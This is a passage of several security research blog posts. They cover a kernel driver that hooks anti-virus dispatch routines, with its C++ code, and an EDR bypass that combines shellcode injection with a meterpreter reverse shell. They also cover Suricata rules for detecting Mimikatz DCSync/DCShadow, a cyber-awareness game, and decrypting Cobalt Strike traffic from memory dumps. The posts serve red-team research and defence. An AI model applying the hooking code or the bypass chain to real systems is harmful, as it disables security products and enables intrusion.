Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \\Driver\\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys –> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
	UNREFERENCED_PARAMETER(DeviceObject);
    auto stack = IoGetCurrentIrpStackLocation(Irp);
	auto status = STATUS_UNSUCCESSFUL;
	KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
	    return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}
void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
	for (int i = 0; i < MaxIntercept; i++) {
		if (globals.Drivers[i].DriverObject == DriverObject) {
			if (globals.Drivers[i].DriverUnload) {
				globals.Drivers[i].DriverUnload(DriverObject);
			}
			UnhookDriver(i);
		}
	}
	NT_ASSERT(false);
}

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck, mimikatz.exe was still detected and blocked. This got me thinking, running such a well-known malicious binary without any attempts to hide it or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I chose for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load-, registry- and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Detecting DCSync and DCShadow Network Traffic

15 November 2021 at 08:30

This blog post on detecting Mimikatz’ DCSync and DCShadow network traffic, accompanies SANS webinar “Detecting DCSync and DCShadow Network Traffic“.

Intro

Mimikatz provides two commands to interact with a Windows Domain Controller and extract or alter data from the Active Directory database.

These two commands are dcsync and dcshadow.

The dcsync command can be used, on any Windows machine, to connect to a domain controller and read data from AD, like dumping all credentials. This is not an exploit or privilege escalation, the necessary credentials are required to be able to do this, for example a golden ticket.

The dcshadow command can be used, on any Windows machine, to connect to a domain controller and write data to AD, like changing a password or adding a user. This too is not an exploit or privilege escalation: proper domain admin credentials are necessary to achieve this.

Both commands rely on the active directory data replication protocol: Directory Replication Service (DRS). This is a protocol (MSRPC / DCE/RPC based) that domain controllers use to replicate their AD database changes between them. The Microsoft API for DRS is DRSUAPI.

Such traffic should only occur between domain controllers. When DRS traffic is detected between a DC and a non-DC (a user workstation for example), alarms should go of.

Alerting

An Intrusion Detection System can detect DRSUAPI traffic with proper rules.

Figure 1: IDS inspecting traffic between workstation and DC

The IDS needs to be positioned inside the network, at a location where traffic between domain controllers and non-domain controllers can be inspected.

DCE/RPC traffic is complex to parse properly. For example, remote procedure calls are done with an integer that identifies the procedure to call. The name of the function, represented as a string for example, is not used in the DCE/RPC protocol. Furthermore, function integers are only unique within an API: for example, function 0 is the DsBind function in the DRSUAPI function, but function 0 is also the DSAPrepareScript in the DSAOP interface.

A very abstract view of such traffic, can be represented like this:

Figure 2: abstraction of DCE/RPC traffic

If an IDS would just see or inspect packet B, it would not be able to determine which function is called. Sure, it is function 0, but for which API? Is it DsBind in the DRSUAPI API or is is DSAPrepareScript in the DSAOP interface? Or another one …

So, the IDS needs to keep track of the interfaces that are requested, and then it can correctly determine which functions are requested.

Alerting dcsync

Here is captured dcsync network traffic, visualized with Wireshark (dcerpc display filter):

Figure 3: DCSync network traffic

Frame 28 is our packet A: requesting the DRSUAPI interface

Frame 41 is our packet B: requesting function DsGetNCChanges

Notice that these packets do belong to the same TCP connection (stream 4).

Thus, a rule would be required, that triggers on two different packets. This is not possible in Snort/Suricata: simple rules inspect only one packet.

What is typically done in Suricata for such cases, is to make two rules: one for packet A and one for packet B. And an alert is only generated when rule B triggers after rule A triggers.

This can be done with a flowbit. A flowbit is literally a bit kept in memory by Suricata, that can be set or cleared.

These bits are linked to a flow. Simply put, a flow is a set of packets between the same client and server. It’s more generic than a connection.

Thus, what needs to be done to detect dcsync traffic using a flowbit, is to have two rules:

  1. Rule 1: detect packet of type A and set flowbit
  2. Rule 2: detect packet of type B and alert if flowbit is set

Suricata rules that implement such a detection, look like this:

alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz DRSUAPI"; 
flow:established,to_server; 
content:"|05 00 0b|"; depth:3; 
content:"|35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2|"; depth:100; 
flowbits:set,drsuapi; 
flowbits:noalert; 
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000010; rev:1;)

alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz DRSUAPI DsGetNCChanges Request";
flow:established,to_server;
flowbits:isset,drsuapi; 
content:"|05 00 00|"; depth:3; 
content:"|03 00|"; offset:22; depth:2;
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000011; rev:1;)

The first rule (Mimikatz DRSUAPI) is designed to identify a DCERPC Bind to the DRSUAPI API. The packet data has to start with 05 00 0B:

Figure 4: DCERPC packet header

5 is the major version of the protocol, 0 is the minor version, and 0B (11 decimal) is a Bind request.

A UUID is used to identify the DRSUAPI interface (this is not done with a string like DRSUAPI, but with a UUID that uniquely identifies the DRSUAPI interface):

Figure 5: DRSUAPI UUID

The UUID for DRSUAPI is

e3514235-4b06-11d1-ab04-00c04fc2dcd2

In network packet format, it is

35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2.

When both content clauses are true, the rule triggers. The action that is triggered, is setting a flowbit named drsuapi:

flowbits:set,drsuapi;

A second action, is to prevent the rule from generating an alert when setting this flowbit:

flowbits:noalert;

This explains the first rule.

The second rule (Mimikatz DRSUAPI DsGetNCChanges Request) is designed to detect packets with a DRSUAPI request for function DsGetNCChanges. The packet data has to start with 05 00 00:

Figure 6: DRSUAPI Request

5 is the major version of the protocol, 0 is the minor version, and 00 is an RPC request.

And further down in the packet data (position 22 to be precise) the number of the function is specified:

Figure 6: DRSUAPI DsGetNCChanges

Number 3 is DRSUAPI function DsGetNCChanges.

When flowbit drsuapi is set and both content clauses are true, the rule triggers.

flowbits:isset,drsuapi;

And an alert is generated.

Notice that the rule names contain the word Mimikatz, but these rules are not specific to Mimikatz: they will also trigger on regular replication traffic between DCs. The key to use these rules properly, is to make them inspect network traffic between domain controllers and non-domain controllers. Replication traffic should only occur between DCs.

Alerting dcshadow

Mimikatz dcshadow command also generates DRSUAPI network traffic, and the rules defined for dcsync also trigger on dcshadow traffic.

One lab in SANS training SEC599, Defeating Advanced Adversaries – Purple Team Tactics & Kill Chain Defenses, covers dcsync and its network traffic detection. If you take this training, you can also try out dcshadow in this lab.

The dcshadow command requires two instances of Mimikatz to run. First, one running as system to setup the RPC server:

Figure 7: first instance of Mimikatz for dcshadow (screenshot a)
Figure 8: first instance of Mimikatz for dcshadow (screenshot b)

And a second one running as domain admin to start the replication:

Figure 9: second instance of Mimikatz for dcshadow

This push instruction starts the replication:

Figure 10: second instance of Mimikatz for dcshadow (screenshot b)

dcshadow network traffic looks like this in Wireshark (dcerpc display filter):

Figure 11: dcshadow network traffic

Notice the DRSUAPI bind requests and the DsGetNCChanges requests -> these will trigger the dcsync rules.

DRSUAPI_REPLICA_ADD is also an interesting function to detect: it adds a replication source. The integer that identifies this function is 5.

Figure 12: DRSUAPI_REPLICA_ADD

A rule to detect this function can be created based on the rule to detect DsGetNCChanges.

What needs to be changed:

  1. The opnum: 03 00 -> 05 00
  2. The rule number, sid:1000011 -> sid:1000014 (for example)
  3. And the rule message (preferably): “Mimikatz DRSUAPI DsGetNCChanges Request” -> “Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request”
alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request";
flow:established,to_server;
flowbits:isset,drsuapi; 
content:"|05 00 00|"; depth:3; 
content:"|05 00|"; offset:22; depth:2;
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000014; rev:1;)

More generic rules

It is also possible to change the flowbit setting rule (rule for packet A), to generate alerts. This is done by removing the following clause:

flowbits:noalert;

Alerts are generated whenever the DRSUAPI interface is bound to, regardless of which function is called.

And a generic rule for a DRSUAPI function call can also be created, by removing the following clause from the DsGetNCChanges rule (for example):

content:”|03 00|”; offset:22; depth:2;

Byte order and DCEPRC

DCERPC is a flexible protocol, that allows different byte orders. A byte order, is the order in which bytes are transmitted over the network. When dealing with integers that are encoded using more than one byte, for example, different orders are possible.

The opnum detected in the dcsync rule, is 3. This integer is encoded with 2 bytes: a most significant byte (00) and a least significant byte (03).

When the byte order is little-endian, the least significant byte (03) is transmitted first, followed by the most significant byte (00). This is what is present in the captured network traffic.

But when the byte order is big-endian, the most significant byte (00) is transmitted first, followed by the least significant byte (03).

And thus, the rules would not trigger for big-endian byte-order.

The byte order is specified by the client in the data representation bytes of the DCERPC packet data:

Figure 13: DCERPC data representation

If the first nibble of the first byte of the data representation is one, the byte order is little-endian.

Big-endian is encoded with nibble value zero.

We have developed rules that check the byte-order, and match the opnum value accordingly:

alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x10,4; byte_test:1,<=,0x11,4; content:"|03 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000012; rev:1;)
alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x00,4; byte_test:1,<=,0x01,4; content:"|00 03|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000013; rev:1;)

alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x10,4; byte_test:1,<=,0x11,4; content:"|05 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000015; rev:1;)
alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x00,4; byte_test:1,<=,0x01,4; content:"|00 05|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000016; rev:1;)

Notice that Suricata and Snort can also be configured to enable the dcerpc preprocessor. This allows for the creation of rules that don’t have to take implementation details into account, like byte-order:

alert dcerpc $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; dce_iface:e3514235-4b06-11d1-ab04-00c04fc2dcd2; dce_opnum:3; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000017; rev:1;)

But such rules can have a significantly higher performance impact, because of the extra processing performed by the dcerpc preprocessor.

Conclusion

In this blog post we show how to detect Active Directory replication network traffic. Such traffic is normal between domain controllers, but it should not be detected between a non-domain controller (like a workstation or a member server) and a domain controller. The presence of unexpected DRS traffic, is a strong indication of an ongoing Active Directory attack, like Mimikatz’ DCSync or DCShadow.

The rules we start with operate at a low network layer level (TCP data), but we show how to develop rules at a higher level, that are more versatile and require less attention to implementation details.

Finally, the rules presented in this blog post are alerting rules for a detection system. But they can easily be modified into blocking rules for a prevention system, by replacing the alert action by a drop or reject action.

All the rules presented here can also be found on our IDS rules Github repository.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Another spin to Gamification: how we used Gather.town to build a (great!) Cyber Security Game

9 November 2021 at 08:33
CSI Game hosted on Gather.town platform

Let’s recap October. Cyber Security Awareness Month. For a cyber awareness enthusiast, it is hard to conceal the excitement that comes with a full month of initiatives in all shapes and sizes, built around a genuine and strong effort to help keep companies and their people “safe online”. At NVISO also, the buzz is tangible, and everyone is eager to know what great projects we will be launching for this year’s Cyber Security Awareness Month. We’re lucky enough to have a client who will go the extra mile and allowed us to let our imagination run wild. And that is exactly what we did.

Let’s make it: “a game”

Our assignment was simple, yet challenging:

  • Define a scenario that fits a “Security at Home” context, where we connect our security tips to a “working from home” context
  • Make something fun out of the everyday security challenges we face in our day-to-day life, at home. Basically, challenges that should be familiar for any player. Not to teach something new, but to reinforce existing awareness as a main goal.
  • Set up a digital experience that allowed people working remotely to collaborate smoothly in a team, and to compete against each other in teams.

Gamification being all the rage, there is quite a few options out there. Some of which we’ve tested and used for projects in the past. Think Online Cyber Escape Games (even a full size escape truck) scavenger hunts, online quizzes, e-learnings, … You name it. However, none of these fully fitted the brief.

A match made in…

Gather.town logo

Inspired by the CSCBE 2021 event, successfully hosted remotely through the use of Gather.town, we came up with the idea of creating our own game and dedicated space. An all-in-one solution which is fully customizable and which allows for direct audio and video communication between hosts, players and teams. A match made in cyber awareness heaven? Or too good to be true? Let’s dive into the details.

Concept

As a concept we opted for the well-known schemes of a classic Crime Scene Investigation (CSI) game which has shown to be a successful basis for many legendary series and video games. We came up with a cyber related crime that could fit into the personal and social environment of your average neighbour and created a whole world around it. By world we mean: a location, a family (and pet), a social life, pieces of evidence and of course many irrelevant objects to create some noise ;-). All elements of this fictional world are linked to clearly defined (not so fictional) cyber security topics and lessons.

“The Harris’s family apartment gets robbed in the middle of the night without them noticing. 

This is strange, since their newly installed connected alarm system was active and signalled “all clear” when they woke up that morning. The whole family is a bit shaken, and no-one can really explain what happened…​

Turns out their alarm system has been compromised and was turned off to ensure the burglar had easy access.”

Teams signing up for the game will be asked to investigate the crime, in order to be able to answer the main question: “how did it happen?”. Additional questions are asked in the ‘investigation report’ to be able to distinguish between top teams and to allow for the game to be a real competition with final scores and a leadership board.

Connecting the dots: tips to create an attractive and usable Gather.town virtual world

To allow for this concept to work in practice, we needed a strong and stable platform that would deliver on both connectivity and experience. That’s were Gather.town comes in play.

Disclaimer: we don’t have any particular business relationship with Gather.town. It’s just that we’ve tested a few platforms, and really liked that particular one.

Designing an attractive map

CSI Game map edition in Tiled

Gather.town consists in a map filled with interactive objects, where your avatar can move around the map and interact with the objects.

First, we needed to create a map that would fulfil our scenario requirements while also being intuitive to walk on for non-gamers people. Instead of designing everything from scratch, we used tile sets from the well-known RPG Maker series and adapted them so they could be easily manipulated in an open-source map editing software called Tiled. Using this software, we were able to divide the map into a set of two layers, the foreground and background. This allowed for a more realistic way of moving in the room by giving a perception of depth for the players.

We decided to go for a square and compact room so that people do not get lost easily, along with the fact that everyone could hear each other even from the other side of the map. However, the sky is basically the limit here. Endless options to go crazy. It is however important to note that this kind of configuration details do really affect the overall user experience and should therefore not be left to chance.

Have the players check out the content of a computer, in the map

As the Gather.town platform is still under development, the number of features available was limited compared to our ambitious game scenario. To increase the range of possible types of interactive objects, we decided to embed a home-made web application to be shown as an iframe in the game. This could be then presented as the content of a computer – for example, the social media profile of a family member, their e-mail inbox, or some Twitter post.       

To touch upon the topic of phishing, we created an e-mail inbox (c.f. screenshot below) with four emails that could or could not be phishing. We decided to go with all legitimate emails for each of which an additional piece of evidence was added somewhere in the room. Participants still needed to look for red flags in the emails, but would find justifications for each email during their investigation.

Mailbox of mother Suzy

Another example is a social media account (and privacy settings page) we created for one of the family members to introduce the topic of social engineering. Participants would need to make some links between this profile and testimonials to understand how the burglar use that technique to commit their crime.

To balance the costs and efforts, we decided to go for a frontend application which would simply be hosted on a S3 AWS Bucket. The application was made using Vue.JS along with Buefy so that we would not have to worry about the design either.

Each interactive item is corresponding to a different path in the URL. Having a frontend-only application did not prevent us from building interactive items. Indeed, we implemented a fake login screen which would validate the credentials in the frontend directly. As the players have a limited time to complete investigation, it is unlikely they will search for the solution in the source code, so we considered we could afford the risk of cheating. However, in general, let’s not consider this as a good practice to validate passwords! 😉

Collecting & processing responses

In order to capture answers to be provided through the investigation report, we used Microsoft Forms (we could not use our web application as it’s a frontend-only one). The great thing about using Microsoft 365 tools is that it allowed us to process the input through a Microsoft Power Automate flow. That way we could already pre-calculate some of the scoring and redirect the output in order to make it easier for the host to preview.

Additionally, we aimed at providing a leader board in real-time and give the result to the players just after they finish the game for the ultimate game/competition experience. It was a challenge to give instantly the overall score for 11 questions, all having different weight, some even having a negative score. To ease our task, we went for Microsoft SharePoint Lists. They are similar to Excel sheets, but more user friendly as the formatting can be customized and the output is really visual.

Having implemented the above, our game was ready to be played!

Challenges?

As for any online security awareness campaign, there are inherent challenges that we tried to overcome by being as prepared as possible. On our side as well as on the client’s side.

Reaching a broad audience

Let’s get things straight. Gamification is hot. However, don’t expect people to sign-up just because it’s a game you’re offering. Add some “online fatigue” to the mix and you have a real challenge at hand.

Therefore, it is best to not leave things at chance. From what we have experienced, the following points are important:

  • Investing time in a proper communication plan and clearly explain the goal of the exercise (by the way, planning for Cyber Month 2022 starts now!). Also showing the platform: a cool set up, e.g. with a small video walkthrough, will attract attention! Word of mouth advertising can spark the interest of a colleague. Capturing testimonials from happy early joiners and sharing them with everyone can help too.
  • Adding a bit of competition by using leader boards can also motivate people into playing your game. A small prize and a big recognition for the winners is always cares for effective communication material.

Testing, testing, testing

From the scenario itself to the most technical parts such as the accessibility of the material or the software used for communicating, testing is crucial. Each issue you will encounter early-on, will prevent this issue from happening during actual game sessions.

How we performed the testing phase:

  • We went for three distinct dry runs, with people from different backgrounds and skills, different teams, and with different computers 😊. Not everyone is used to collaboration tools and games, and dry runs enabled us to identify confusing items and rework them.

We had multiple people in our team running the game, sometimes at the same moment too so we needed them to operate with a certain degree of autonomy and know to handle every potential error. We thus thought about the most plausible failure scenarios and prepared a B-plan for each of these cases. Documenting those fallback procedures is essential to ensure issues can be tackled rapidly, when in the midst of the action.

Conclusion

At the end of the day, the CSI concept and the use of Gather.Town as a dedicated space really lived up to our expectations. Participants had fun creating avatars and indicated they had a great time while reinforcing knowledge on Cyber Security Awareness topics they might have come across in the past… If this is setting the bar for next year, we cannot wait to see what Cyber Security Awareness Month has in store for use!

About the authors

Sophie Madessis is a member of the NVISO Labs team involved in various R&D tasks to support other teams regarding cyber security related projects. Along with performing some security assessments, she likes spending time on automating processes using Power Automate and other Microsoft tools. You can find Sophie on Linkedin.

Hannelore Goffin is a senior consultant within the Cyber Strategy team at NVISO where she is passionate about raising awareness on all cyber related topics, both for the professional and personal context. Next to awareness, Hannelore focuses on third party risk management. You can find Hannelore on Linkedin.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Cobalt Strike: Using Process Memory To Decrypt Traffic – Part 3

3 November 2021 at 19:18

We decrypt Cobalt Strike traffic with cryptographic keys extracted from process memory.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. And in part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In this blog post, we will explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump.

Cobalt Strike network traffic can be decrypted with the proper AES and HMAC keys. In part 2, we obtained these keys by decrypting the metadata with the private RSA key. Another way to obtain the AES and HMAC key, is to extract them from the process memory of an active beacon.

One method to produce a process memory dump of a running beacon, is to use Sysinternals’ tool procdump. A full process memory dump is not required, a dump of all writable process memory is sufficient.
Example of a command to produce a process dump of writable process memory: “procdump.exe -mp 1234”, where -mp is the option to dump writable process memory and 1234 is the process ID of the running beacon. The process dump is stored inside a file with extension .dmp.

For Cobalt Strike version 3 beacons, the unencrypted metadata can often be found in memory by searching for byte sequence 0x0000BEEF. This sequence is the header of the unencrypted metadata. The earlier in the lifespan of a process the process dump is taken, the more likely it is to contain the unencrypted metadata.

Figure 1: binary editor view of metadata in process memory

Tool cs-extract-key.py can be used to find and decode this metadata, like this:

Figure 2: extracted and decoded metadata

The metadata contains the raw key: 16 random bytes. The AES and HMAC keys are derived from this raw key by calculating the SHA256 value of the raw key. The first half of the SHA256 value is the HMAC key, and the second half is the AES key.

These keys can then be used to decrypt the captured network traffic with tool cs-parse-http-traffic.py, like explained in Part 2.

Remark that tool cs-extract-key.py is likely to produce false positives: namely byte sequences that start with 0x0000BEEF, but are not actual metadata. This is the case for the example in figure 2: the first instance is indeed valid metadata, as it contains a recognizable machine name and username (look at Field: entries). And the AES and HMAC key extracted from that metadata, have also been found at other positions in process memory. But that is not the case for the second instance (no recognizable names, no AES and HMAC keys found at other locations). And thus that is a false positive that must be ignored.

For Cobalt Strike version 4 beacons, it is very rare that the unencrypted metadata can be recovered from process memory. For these beacons, another method can be followed. The AES and HMAC keys can be found in writable process memory, but there is no header that clearly identifies these keys. They are just 16-byte long sequences, without any distinguishable features. To extract these keys, the method consists of performing a kind of dictionary attack. All possible 16-byte long, non-null sequences found in process memory, will be used to try to decrypt a piece of encrypted C2 communication. If the decryption succeeds, a valid key has been found.

This method does require a process memory dump and encrypted data.
This encrypted data can be extracted using tool cs-parse-http-traffic.py like this: cs-parse-http-traffic.py -k unknown capture.pcapng

With an unknown key (-k unknown), the tool will extract the encrypted data from the capture file, like this:

Figure 3: extracting encrypted data from a capture file

Packet 103 is an HTTP response to a GET request (packet 97). The encrypted data of this response is 64 bytes long: d12c14aa698a6b85a8ed3c3c33774fe79acadd0e95fa88f45b66d8751682db734472b2c9c874ccc70afa426fb2f510654df7042aa7d2384229518f26d1e044bd

This is encrypted data, sent by the team server to the beacon: it contains tasks to be executed by the beacon (remark that in these examples, we look at encrypted traffic that has not been transformed, we will cover traffic transformed by malleable instructions in an upcoming blog post).

We can attempt to decrypt this data by providing tool cs-extract-key.py with the encrypted task (option -t) and the process memory dump: cs-extract-key.py -t d12c14aa698a6b85a8ed3c3c33774fe79acadd0e95fa88f45b66d8751682db734472b2c9c874ccc70afa426fb2f510654df7042aa7d2384229518f26d1e044bd rundll32.exe_211028_205047.dmp.

Figure 4: extracting AES and HMAC keys from process memory

The recovered AES and HMAC key can then be used to decrypt the traffic (-k HMACkey:AESkey):

Figure 5: decrypting traffic with HMAC and AES key provided via option -k

The decrypted tasks seen in figure 5, are “data jitter”. Data jitter is a Cobalt Strike option, that sends random data to the beacon (random data that is ignored by the beacon). With the default Cobalt Strike beacon profile, no random data is sent, and data is not transformed using malleable instructions. This means that with such a beacon profile, no data is sent to the beacon as long as there are no tasks to be performed by the beacon: the Content-length of the HTTP reply is 0.

Since the absence of tasks results in no encrypted data being transmitted, it is quite easy to determine if a beacon received tasks or not, even when the traffic is encrypted. An absence of (encrypted) data means that no tasks were sent. To obfuscate this absence of commands (tasks), Cobalt Strike can be configured to exchange random data, making each packet unique. But in this particular case, that random data is useful to blue teamers: it permits us to recover the cryptographic keys from process memory. If no random data would be sent, nor actual tasks, we would never see encrypted data and thus we would not be able to identify the cryptographic keys inside process memory.

Data sent by the beacon to the team server contains the results of the tasks executed by the beacon. This data is sent with a POST request (default), and is known as a callback. This data too can be used to find decryption keys. In that case, the process is the same as shown above, but the option to use is -c (callback) in stead of -t (tasks). The reason the options are different, is that the way the data is encrypted by the team server is slightly different from the way the data is encrypted by the beacon, and the tool must be told which way to encrypt the data was used.

Some considerations regarding process memory dumps

For a process memory dump of maximum 10MB, the “dictionary” attack will take a couple of minutes.

Full process dumps can be used too, but the dictionary attack can take much longer because of the larger size of the dump. Tool cs-extract-key.py reads the process memory dump as a flat file, and thus a larger file means more processing to be done.

However, we are working on a tool that can parse the data structure of a dump file and extract / decode memory sections that are most likely to contain keys, thus speeding up the key recovery process.

Remark that beacons can be configured to encode their writable memory while they are not active (sleeping): in such cases, the AES and HMAC keys are encoded too, and can not be recovered using the methods described here. The dump parsing tool we are working on will handle this situation too.

Finally, if the method explained here for version 3 beacons does not work with your particular memory dump, try the method for version 4 beacons. This method works also for version 3 beacons.

Conclusion

Cryptographic keys are required to decrypt Cobalt Strike traffic. The best situation is to have the corresponding private RSA key. If that is not the case, HMAC and AES keys can be recovered using a process memory dump and capture file with encrypted traffic.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Kernel Karnage – Part 2 (Back to Basics)

29 October 2021 at 14:40

This week I try to figure out “what makes a driver a driver?” and experiment with writing my own kernel hooks.

1. Windows Kernel Programming 101

In the first part of this internship blog series, we took a look at how EDRs interact with User and Kernel space, and explored a frequently used feature called Kernel Callbacks by leveraging the Windows Kernel Ps Callback Experiments project by @fdiskyou to patch them in memory. Kernel callbacks are only the first step in a line of defense that modern EDR and AV solutions leverage when deploying kernel drivers to identify malicious activity. To better understand what we’re up against, we need to take a step back and familiarize ourselves with the concept of a driver itself.

To do just that, I spent the vast majority of my time this week reading the fantastic book Windows Kernel Programming by Pavel Yosifovich, which is a great introduction to the Windows kernel and its components and mechanisms, as well as drivers and their anatomy and functions.

In this blogpost I would like to take a closer look at the anatomy of a driver and experiment with a different technique called IRP MajorFunction hooking.

2. Anatomy of a driver

Most of us are familiar with the classic C/C++ projects and their characteristics; for example, the int main(int argc, char* argv[]){ return 0; } function, which is the typical entry point of a C++ console application. So, what makes a driver a driver?

Just like a C++ console application, a driver requires an entry point as well. This entry point comes in the form of a DriverEntry() function with the prototype:

NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath);

The DriverEntry() function is responsible for 2 major tasks:

  1. setting up the driver’s DeviceObject and associated symbolic link
  2. setting up the dispatch routines

Every driver needs an “endpoint” that other applications can use to communicate with. This comes in the form of a DeviceObject, an instance of the DEVICE_OBJECT structure. The DeviceObject is abstracted in the form of a symbolic link and registered in the Object Manager’s GLOBAL?? directory (use sysinternal’s WinObj tool to view the Object Manager). User mode applications can use functions like NtCreateFile with the symbolic link as a handle to talk to the driver.

WinObj

Example of a C++ application using CreateFile to talk to a driver registered as “Interceptor” (hint: it’s my driver 😉 ):

HANDLE hDevice = CreateFile(L"\\\\.\\Interceptor)", GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);

Once the driver’s endpoint is configured, the DriverEntry() function needs to sort out what to do with incoming communications from user mode and other operations such as unloading itself. To do this, it uses the DriverObject to register Dispatch Routines, or functions associated with a particular driver operation.

The DriverObject contains an array, holding function pointers, called the MajorFunction array. This array determines which particular operations are supported by the driver, such as Create, Read, Write, etc. The index of the MajorFunction array is controlled by Major Function codes, defined by their IRP_MJ_ prefix.

There are 3 main Major Function codes along side the DriverUnload operation which need initializing for the driver to function properly:

// prototypes
void InterceptUnload(PDRIVER_OBJECT);
NTSTATUS InterceptCreateClose(PDEVICE_OBJECT, PIRP);
NTSTATUS InterceptDeviceControl(PDEVICE_OBJECT, PIRP);

//DriverEntry
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
